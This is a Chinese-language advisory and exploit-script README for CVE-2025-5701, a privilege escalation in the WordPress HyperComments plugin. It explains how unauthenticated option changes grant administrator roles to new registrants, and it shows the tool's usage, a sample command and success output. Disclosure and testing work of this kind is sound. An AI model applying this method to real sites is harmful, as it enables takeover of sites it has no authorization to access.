严重性: 严重 (CVSS 9.8)
受影响插件: WordPress 的 HyperComments 插件
受影响版本: ≤ 1.2.2
WordPress 的 HyperComments 插件由于在 hc_request_handler 函数中缺少权限检查,导致存在未经授权修改 WordPress 选项的漏洞。这使得未认证攻击者能够更新任意 WordPress 选项,例如:
users_can_register)default_role)通过组合利用这些选项,攻击者可以启用注册并确保任何新用户自动被授予管理员角色。
CVSS v3.1: 9.8 严重
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
CVE-2025-5701 - 未认证权限提升漏洞利用
作者:Khaled Alenazi (Nxploited)
用法:CVE-2025-5701.py [-h] -u URL
CVE-2025-5701 - 未认证权限提升漏洞利用 by Khaled Alenazi (Nxploited)
选项:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标基础 URL(例如 http://target-site.com)
python3 CVE-2025-5701.py -u http://target-site.com
CVE-2025-5701 - 未认证权限提升漏洞利用
作者:Khaled Alenazi (Nxploited)
[+] 目标存在漏洞(版本:1.2.2)—— 继续利用。
[+] 可利用端点可访问。
[+] 服务器响应:{"result":"success"}
[+] 注册现已启用。新用户将被分配管理员角色。
[+] 在此注册:http://target-site.com/wp-login.php?action=register
漏洞利用作者:Khaled Alenazi (Nxploited)
此脚本仅供教育目的使用。未经许可擅自访问系统是非法且不道德的。请仅在受控环境或获得明确授权的情况下使用。
Nxploited (Khaled_alenazi)